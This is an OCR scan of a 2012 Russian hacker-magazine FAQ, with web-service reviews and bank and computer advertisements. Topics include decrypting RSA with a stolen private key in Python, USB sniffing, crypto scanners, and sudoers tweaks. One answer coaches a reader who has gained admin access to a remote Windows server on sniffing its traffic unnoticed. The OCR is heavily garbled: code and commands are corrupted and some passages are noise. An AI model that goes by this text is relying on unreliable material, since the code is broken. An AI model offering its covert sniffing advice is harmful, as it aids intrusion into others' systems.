Ш), или, как все это вместе называют, 
закрытый ключ. Если удалось каким-то 
образом им завладеть, то дело за малым. Для 
наших целей идеально подойдет РуіЬоп, на 
котором проблема расшифрования сводится 
к паре строк. А именно: 

#3аюзаем стандартную криптобиблиотеку 
ітрогі: СгурТо. РиЬІісКеу . К5А 

и Р. как правило, очень большие 
#числа. о чем сообщит интерпретатору 
#флаг I в конце значения . 
Сі=0х63е74967еаеа2025с98с69-Рбе-Р07 

#... Здесь было много строк хексов 

2с6е6ЬсІ27еаа71сс0288сІ-Р1ессЗЬ062ЬІ_ 

п=0х95сІаее1Ье05-Р3038ае529е-Р2668а 

#. . . И здесь тоже =) 

772888~Рі-РсІ71аа08'Р08502а141Ь611-Рі- 
#Инициализируем криптосистему. Второй 
#параметр - открытая экспонента, не 
#использѵемая при расшифровании. 
кеу=Сгур1:о. РиЬІісКеу . К5А. 
сопз1:гис1:((п л 0 л с1)) 

#Все. остается лишь вызвать метод 

#с1есгур~Ь от шифртекста 

кеу . сіесгурі: ( сЬірИегІіехІ: ) 



□ С ПОМОЩЬЮ ЧЕГО 

МОЖНО АНАЛИЗИРОВАТЬ 
ВЗАИМОДЕЙСТВИЕ СИСТЕМЫ 
С РАЗЛИЧНЫМИ УСТРОЙСТВАМИ 
ПО 05В? 

Для изучения такого низ- 
коуровневого взаимодействия 
предпочтительнее исполь- 
зовать аппаратный сниффер. К сожа- 
лей ию, только та к можно обеспечить 
абсолютную прозрачность наблюдения 
для исследуемого устройства. Но если 
нетжелания расставаться с сотнями 
условных единиц, для пробы пера можно 
обойтись и программным решением. 

В Ыпих для этих целей имеется заме- 
чательный модуль ядра с говорящим 
названием изЬтоп, который позволяет 
получатьданные, циркулирующие между 
драйверами устройств и драйвером 115В 



Нозі: СопІгоІІег. Несмотря наточто всеэто 
происходит уже в ядре ОС, этого вполне 
достаточно для получения картины про- 
исходящего обмена данными илидаже 
ловли багов в юзерспейс-д рай верах :). 
Чтобы все это заработало, достаточно 
подгрузить наш модуль и смонтировать 
сІеЬиді'з (в ВаскТгаскб Р2 по умолчанию 
эти операции уже проделаны заботливы- 
ми разработчиками): 

тосІргоЬе изЬтоп 

тоипі: -1: сІеЬи§-р5 Л 

попе_сІеЬи§5 /5у5/кегпе1/сІеЬи§ 

Как ни странно, но для разбора 115В- 
протокола какнельзя лучше подойдет 
всеядный ѴѴігезЬагк, способный захва- 
тывать потоке интересующей нас шины 
и представлятьего в подходящем для 
восприятия человека виде. 



Ц-ЧЦ Ьіж кит Іі+-г ? |,Ші гр^Кл к I г. 1 | Ч УГЫ Н і»ѵ ЧгЛ 

ЯлІ ТНгрЛопу Ш Мпгиіі 1 1 г--п 



Прослуши- 
вание 115В- 
взаимодействия 
в ѴѴігезЬагк 
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5пй СгурІоБсаппег 


■ ■ НазИ & Сгуріо Реіесіог 




3 


Еще одно дополнение для семей- 
ства отладчиков ОІІуйЬд / Іттипііу 


щ Просто удобный зіапсіаіосіе- 

криптосканер. Позволяет выявлять 


5 



йеЬиддег. Распространяется в виде динамиче- 
ской библиотеки, подгружаемой при запуске, 
после чего запустить плагин можно, выбрав 
соответствующий пункт в меню «РІидіпз». По- 
зволяет в один клик выставить точки останова 
на секции памяти, содержащие найденные сиг- 
натуры. Немаловажно и то, что 5пй единствен- 
ный справился с обнаружением нестандартной 
индексной таблицы в реализации Ьазе64. 



множество полезных свойств исследуемого 
файла, среди которых информация об исполь- 
зованном компиляторе, реализованных методах 
защиты и упаковщиках. Традиционный сигна- 
турный поиск дополнен функционалом эври- 
стического анализа, что выгодно отличает этот 
детектор. Приятным бонусом является возмож- 
ность производить запуск приложения и анализ 
уже распакованного исполняемого кода. 



Мсгурі 

Быстрый криптосканер, распростра- 
няемый под лицензией СРІ_ѵ2. Одно 
из немногих действительно кроссплатфор- 
менных решений для поиска криптосигнатур. 
Консольный интерфейс чрезвычайно прост — 
в качестве параметров достаточно предоста- 
вить лишь имя исследуемого файла. Ничего 
лишнего — в лучших традициях принципа 
КІ55, сканер, готовый выручить, в случае 
необходимости реверсинга в среде, отличной 
от ѴѴіпсІоѵѵз. 
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При использовании РуІЬоп в режиме 
интерактивной командной строки очень 
не хватает автодополнения по нажатию на 
<ТАВ>. Есть ли какие-нибудь решения именно 
для консоли? 

РуіЬоп БИеМ оченьудобный инструмент и, 
как видно из предыдущего вопроса, 
идеален для быстрого решения задач 
в несколько строк. Держать в голове все 
доступные методы и функции, конечно же, 
невозможно, и каждый раз вызывать ЬеІрО 
совсем не круто Повысить интерактивность 
и скорость работы с интерпретатором нам 
поможет модуль гісотріеіег в связке с геасіііпе. 
Достаточно подключить их и назначить 
действие автодополнения на нужную клавишу. 

ітрогі: гісотріеіег 
ітрогі: геасіііпе 

геасіііпе. ра г зе_апсІ_ЬіпсІ( ,, 1:аЬ : сотріеіе" ) 

Все, можно, нажав <ТАВ>, получать список 
возможных вариантов завершения команды! 
Чтобы не заморачиваться с подключением 
модулей, каждый раз открывая новую консоль, 
можно прописать эти строки в файл инициали- 
зации шелла. Для этого в домашней дирек- 
тории создадим файл .руге и поместим в него 
эти строки. А в .ЬазЬгс добавим переменную 
окружения, дающую РуіЬоп знать, откуда брать 
команды, исполняемые при запуске. 

саі >> ~/.ЬазІігс 

ехрогі РУТНОІМ5ТАКТІ)Р="~/ . руге" 

Любопытно, что с использованием би- 
блиотеки геасіііпе работает и замечательная 
утилитка сііпк [ Ьіі.Іу/сІіпкстсІ ). делающая 
возможным полноценное использование 
стандартного ѴѴіпсіоѵѵз-шелла стб.ехе, рас- 
ширяя интерпретатор автодополнениями 
и ЬазЬ-подобными функциями оперирования 
с историей команд. (Подробнее о подобных ин- 
струментах можно прочитать в статье «Жизнь 
в консоли ѴѴіпсІоѵѵз» в этом номере.) 

Посоветуйте легковесный файрвол для 
ѴѴіпсІоѵѵз. 

Межсетевой экран — компонент системы, 
выбору которого, безусловно, стоит 
уделять достаточное внимание. В выборе для 
рабочей станции или домашнего компа я 
советую остановиться на ТіпуѴѴаІІ [ Ьіі.Іѵ/ 
ііпуіігеѵѵаіі ). Нетребовательный к ресурсам, он 
просто выполняет возложенные на него 
функции — блокирует сетевой трафик согласно 
гибко настраиваемым правилам. В несколько 
кликов позволяет переключаться между 
режимами защиты, поддерживает вайтлистинг 
по процессам или приложениям. Одно из 
главных достоинств — ТіпуѴѴаІІ практически не 
привлекает к себе внимания пользователя: 
есть лишь иконка контроллера в системном 
трее, а постоянные информирующие окна 
и подсказки отсутствуют. Из дополнительных 
фич — наличие поддержки ІРѵб и мониторинг 
изменений Ьозіз-файла. 



Я получил админский доступ к удален- 
ному виндовому серверу. Как наиболее 
незаметно и без заморочек организовать 
прослушивание трафика? 

С такой проблемой приходится сталки- 
ваться довольно часто. Однако, 
к счастью, спецы по сетевой безопасности 
и компьютерной криминалистике из ІМеІгезес 
написали консольный пакетный сниффер 
РаѵѵСар ( Ьіі.Іѵ/гаѵѵсар ). Мало того что она весит 
всего 17 килобайт, так еще и не требует 
абсолютно никаких зависимостей: не надо 
дополнительно ни библиотек, ни сетевых 
драйверов типа ѴѴіпРсар! Просто запускаешь 
с админскими правами, и после старта тебе 
будет представлен в удобном виде список всех 
сетевых интерфейсов, где надо выбрать номер 
прослушиваемого интерфейса и имя для 
рсар-файла. 

«А что же с этим дампом делать дальше?» — 
спросишьты. Но и тутза тебя уже позаботи- 
лись. Сайт СІоисІБЬагк.огд представляет собой 
не что иное, как онлайн-версию знаменитого 
сниффера ѴѴігезЬагк. Загружаешь рсар-файл 
и анализируешь пакеты в до боли знакомом 
интерфейсе. Ктвоим услугам привычные филь- 
тры и инструменты для анализа. Кроме того, 
все, что ты видишь на экране монитора, будет 
сохранено в облаке и доступно по постоянной 
ссылке, как и сам оригинал дампа пакетов. 

Что можешь посоветовать, когда нужно 
срочно продиагностировать систему, 
а нужного софта, как назло, нет под рукой? 

В этом вопросе, без сомнения, Марку 
Руссиновичу нет равных. Его легендар- 
ные утилиты должны быть в аптечке каждого 
хакера :). Ну а если вдругу тебя их не оказа- 
лось, то ты можешь заюзать их прямо с сайта 
Бузіпіегпаіз! Просто подключи сетевой диск 
\\Ііѵе.5у5ІпІегпаІ5.сот\іооІ5\. Со всеми 
утилитами можно ознакомиться по ссылке 
Ьіі.іѵ/зузіпііооіз . 

Заинтересовался поиском уязвимостей 
в программах. Где бы взять материалы 
для экспериментов? 

Ты наверняка уже слышал про дистрибу- 
тивы типа йатп ѴиІпегаЫе І_іпих, которые 
созданы специально для того, чтобы их ломать. 
Однако следует оговориться, что большинство 
таких сборок основаны на операционной систе- 
ме І_іпих и содержат, как правило, слишком 
тривиальные баги, которые ты вряд ли 
встретишь в реальной жизни. Чтобы разноо- 
бразить кругозор и приноровиться к поиску 
дыр в популярном софте, который используют 
миллионы людей ежедневно, советую учиться 
сразу на этих программах. Прошло то время, 
когда информацию для обучения приходится 
искать по крупицам, словно 15 лет назад. 

В наши дни в Сети можно найти море информа- 
ции о поиске уязвимостей. Алгоритм простой: 
найти отчет об уязвимости и распотрошить 
подопытную программу согласно этому отчету. 
Результаты своего исследования хакеры 
обычно выкладывают на сайты, которые 



представляют собой базу данных эксплойтов. 
Самыми популярными являются 1337сІаѵ.сот 
и ехрІоіі-сІЬ.сот . Там ты можешь найти 
информацию об авторе и его исследовании, 
ссылки по теме, а самое главное — техниче- 
ские детали уязвимости. Выяснив версию 
приложения, следует скачать его с официаль- 
ного сайта и начать эксперименты. Очень часто 
разработчики выкладывают только самую 
последнюю стабильную версию, тогда на 
помощь приходят архивы старого софта. 
Рекомендую оИѵегзіоп.сот и оИаррз.сот, где 
можно найти практически любые программы 
под большинство популярных платформ. Ну 
и добавим в коллекцию каталог образов 
виртуальных машин озѵі гіиа I . пеі. куда уже 
установлены старые версии различных, в том 
числе экзотических операционных систем. 

Я много времени провожу за работой 
в ВаскТгаск Ыпих, иногда голова просто 
кипит. Как можно отвлечься, не прекращая 
свою деятельность? 

Специально для таких случаев разработ- 
чики Ыпих и других входящих в дистри- 
бутив программ подготовили несколько 
пасхальных яиц. Серьезные парни тоже могут 
веселиться :). Если ты вдруг ошибешься при 
вводе пароля, то программа будет стебать тебя 
:). Например, так: 

I баѵе Ьееп саііесі могзе. 

МауЬе і-Р уои изесі топе іііап 
□ и 5І: імо бп§ег5 . . . 

І-ізіеп. Ьиппіііо Ьгаіпз. I сІопН Ііаѵе 
ііте іо Іізіеп іо іНіз ігазіі. 

Для этого отредактируй файл зисіоегз, 
добавив в конец строки йеі'аиііз слово іпзиііз. 
Выглядит примерно так: 

Ре-Раиііз ! 1есЬиге.Иу_ 
ііекеіз, !-РрсІп Дпзиііз 

Для редактирования советую использовать 
не обычный редактор, а ѵізисіо, который про- 
веряет синтаксис файла перед сохранением. 

Если ты опечатаешься при вводе одной 
из самых частых команд Із и введешь зі, то на 
экране проедет паровозик! Иногда требуется 
самому установить этот пакет: 

арі-^еі: і пзіаіі зі 

Почерпнуть знания о зарождении нового 
мира можно, если в Рігеіох ввести в адресную 
строку «аЬоііЕтогіІІа». А если этот мир тебя не 
привлекает, ты можешь увидеть робота с дру- 
гой планеты, введя «аЬоиЕгоЬоІз». Ну а если 
ты считаешь, что роботы — это неинтересно, 
то тебя ждет игра Зразе Іпѵасіегз. Для этого 
в программе Саіс из пакета Ореп Оііісе введи 
=6ате( м 51аг\Л/аг5 м ). 

В общем, разработчики тоже люди и, ко- 
нечно же, позаботились о том, чтобы напол- 
нить приятными мгновениями твои тяжелые 
хакерские будни. И-И 















142 



ХАКЕР 09/164/2012 





2ат2от 1.0.0 Оттр 0.6 РозідгеБСИ 9.1.4 

5аде 5.2 БатЬа 3.6.6 

>5есигИу БітрІеВигп 1.6.4 БепсІтаіІ 8.14.5 

Вгоѵѵзег Еогепзіс ТооІ зоипсІКопѵегІег 1.6.3 БдиісІ 3.1.20 

ЕпЬапсесІ Мііідаііоп Ехрегіепсе Тотсаі 7.0.29 







РАО 



ѴѴѴѴѴѴ2 



Ніи увиг мсоипй Ьееп согпрютіжгі? Гіи) ішт, 



рпапіістіп л тт*г 
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Постоянно обновляемая база имейлов жертв утечек данных 
с популярных сервисов 



ршеоизт 



рѵѵпесНізІі.сот 

Утечка данных в сервисах вроде Базит или 5іеат многим кажется не таким уж и страш- 
ным событием, и пользователи не всегда понимают, что стоит сменить пароль к ящику 
и включить детализацию счета в банке. Сервис РѵѵпесНізІ предлагает проверить, не 
затронули ли хакерские атаки неприкосновенность конкретно ваших данных. Для этого 
достаточно вбить адрес электронной почты, а сервис проверит его по своей базе из почти 
25 миллионов записей. Параноики могут быть спокойны — о РѵѵпесНізІ писали такие изда- 
ния, как РогЬез и 20ЫеС а значит, это не очередная ловушка. Однако если этого недоста- 
точно, имейл можно передать в виде хеша 5НА-512 (воспользовавшись, например, вот этим 
калькулятором: НазЬ.опІіпе-сопѵегІ.сот ). Также сервис предлагает зарегистрированным 
пользователям уведомления о попадании в базу, обновляемую после каждой новой атаки. 



М001ІРБ 



тодцрз.сопп 

С каждым днем появляется все больше сервисов и приложений для прототипирова- 
ния, позволяющих быстро набросать эскиз предполагаемого экрана приложения или 
веб-сервиса. Как известно, картинка лучше тысячи слов, и лучше, чтобы она была 
сделана не ручкой на салфетке. Бесплатный сервис Моцирз позволяет создавать эскиз 
интерфейса сайта, приложения или даже программы для іРЬопе и получить картинку в 
РйР или РІ\І6, которую можно показать заказчику или коллеге-фронтендщику. В наборе 
есть все модные элементы, включая «хлебные крошки» и «риббоны», а зарегистри- 
рованные пользователи могут добавлять собственные элементы. Объекты на рисунке 
легко привязываются к схеме, группируются и организуются в слои. При этом среда 
Удобный веб-сервисдля прототипирования интерфейсов позволяет сделать эскиз всех экранов интерфейса, обозначив переходы между ними, 

приложений и веб-сайтов 




МАРКІІРѴѴАМО 



тагкирѵѵапсі.сопп 

Общение дизайнеров и верстальщиков — сложный процесс, полный конфликтов и 
взаимных упреков. Конечная цель этого диалога — превращение Р5й-макета в готовый 
код, и, чтобы добиться этого, хороши любые методы. Верстальщики, желающие немного 
упростить себе жизнь, могут воспользоваться сервисом МагкирѵѵапсІ. Он автоматически 
сконвертирует файл Р5й в аккуратный код, с которым уже можно будет работать. При этом 
получается чистый и валидный НТМІ_ и С55, оформленный и сконвертированный при по- 
мощи связки 5А55 и Сотразз, — это повышает читаемость. Конечно, все это не может из- 
бавить от ручной работы, но тогда верстальщики не были бы нужны, верно? А дизайнерам 
Веб-сервис, конвертирующий РБб-макеты сайта в НТМЬкод стоит ознакомиться с правилами хорошего тона при подготовке Р50-макета ( ііоѵерзсі.ги ). 




5ЕСІІРЕ 5Н ЕЬЬ 



доо.дІДІМѴѴрЬ 

Бесиге БЬеІІ — расширение для Соодіе СЬготе, разработанное самой компанией, кото- 
рое позволяет подключаться по 55Н к удаленной машине прямо из вкладки браузера. 
Плагин представляет собой портированный ОрепББН и терминал Ыегт (все благодаря 
технологии Ыаііѵе СІіепі), поэтому работает быстро и стабильно. Недостатком является 
то, что настройки доступны только через консоль ^ѵаБсгірІ в самом СЬготе (под- 
робнее — в инструкции от разработчиков доо.дІ/т6М|8 ). С другой стороны, это удобное 
решение «на всякий случай», позволяющее подключиться к своему серверу из любого 
места, где есть доступ к Сети. Не хватает полноценного «брелока» для хранения 
информации о хостах и ключах, но адреса серверов можно сохранять в виде закладок 
ББН-клиѳнт в виде расширения для боодіе СЬготе браузера и синхронизировать между машинами пользователя. 



■- ел 



гол мрр г*іі . и ідо Гі|+ І.ЯЯ-ІІМ 14 м ІРІШР мниі>ь 
I ія ■! г-.ѵѴ і Іл. л : ' і рмііЛМ 
^ ІѴ' уічіаг 1 1 р лгіі^ 

1 Іи. л ’і і 

ішн чля іи \л кггіФІіи Ж1 «І.Ш.Іія.ІН 

4 II /I і 

_ ■ І\ _1 ■ У I . 

/ 1 1-1 1 І ] I і |/г л 
I |І'І I * п 

“'I * 

I / -- 1 .. Гг, 1_ 

Ь \ ■* \ 1 | 

3^ Г т и Щ; 1 1 |Г 



■’і I ііѵ іітгі гт іГ рж к 

Иі* ГЧ1Т М Ѵ1СѴ. ІЭЫШЙНІ №1 



144 



ХАКЕР 09/164/2012 















Получать скидки 
в барах, ресторанах и 
магазинах твоего 
города 



Участвовать в акциях и посещать закрытые 
мероприятия для держателей «Мужской Карты» 



Управлять своими счетами, используя систему 
интернет-банка «Альфа-Клик» 



Оформитъ дебетовую или кредитную «Мужскую карту* можно в отделениях 
ОАО «Альфа-Банка», а также заказав по телефонам: 

8 (495) 788-88-78 в Москее 1 8-800-2000-000 в регионах России {звонок бесплатный) 



А Альфа* Банк {дажЦапй 



ѵѵмѵ.тапсапігіі 



івсхих операций от 05.ВД 2012 №1326' 



>9нм. Генеральная лицензии банка России па 
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компьютеры 



Что вы хотите от своего компьютера? 

Мой компьютер должен быть современным, быстрым и надежным. 

Мой компьютер должен делать любую работу, которую я ему поручу. 

Мой компьютер должен иметь больше возможностей, чем я могу сегодня представить. 

Все эти желания исполнятся, если ваш новый компьютер РІ.ЕХТКОІМ® Ргетіега 55 
на базе процессора Іпіеі® Соге™ І5-3550. 




Хранить 1 000 фильмов НЮ 
или 1 000 000 фотографий 
или 10 000 звуковых дисков... 

Хранить резервные копии всех 
ваших любимых "гаджетов" - 
всяких смартфонов и іРасГов... 



• Работать в несколько раз быстрее 
вашего ноутбука... 

• Играть в любые игры, показывать 
ЗР-фильмы и ЗР-фото... 




( 495 ) 925 - 64-47 

ѵѵѵѵѵѵТсепіег.ги ѵѵѵѵѵѵТсзЬор.ги 




Адреса салонов-магазинов: 



м. «Бабушкинская» ул. Сухонская, 7А 
м. «Владыкино» Алтуфьевское ш., 16 
м. «Беляево» ул. Миклухо-Маклая, 55 
м. «Улица 1905 года» ул. Мантулинская, 2 



* Цена дана на 01.08.2012 




• Четырехъядерный 
процессор 
третьего поколения 
Іпіеі® Соге™ І5-3550 

• Платформа А51І5 

• 8 ГБ ООКЗ РС10600 

• 1500 ГБ 5АТА III, 32М/7200 

• Графический процессор 
ІЧѴЮІА ОеРогсе 550ТІ 1024МВ 

• Привод ОѴЭіКѴѴ МиІІі 

• СагсІ Кеасіег 115В 3.0 

• Высококачественный корпус 
Іп-ѴѴіп ЕАК-011 450Вт 

• Лицензионная операционная 
система ѴѴіпсІоѵѵз 7 

• М іеговой: ОІТісе 51а Пег 2010 

• Антивирус М5 Еззепііаі 




Но!.. Самое главное - это надежность и удобство. 

Нам удобнее работать за большим ярким экраном, 
набирать текст на нормальной клавиатуре и управлять 
нормальной мышкой. 

Наши фотографии, фильмы, музыка, наши письма, заметки 
и книжки - уникальны, а значит бесценны! Для того, что бы 
их не потерять, нужен максимально надежный компьютер. 

Поэтому ваш выбор - компьютер Р^ЕXТIЮN! 




ви? 

КОМПЬЮТЕРЫ ОРГТЕХНИКА 
КОМПЛЕКТУЮЩИЕ 



Магазины «Ф-Центр» 

Удобство покупки 

Выгода всегда 




ІпЬеІ, логотип ІпЬеІ, ІпЬеІ Іпзісіе, ІпЬеІ Соге и Соге Іпзісіе являются товарными знаками корпорации ІпЬеІ на территории США и других стран. Для получения дополнительной информации о рейтинге процессоров ІпЪеІ посетите сайт ілііліѵѵ.іпіеі.ги/гаііпд. 






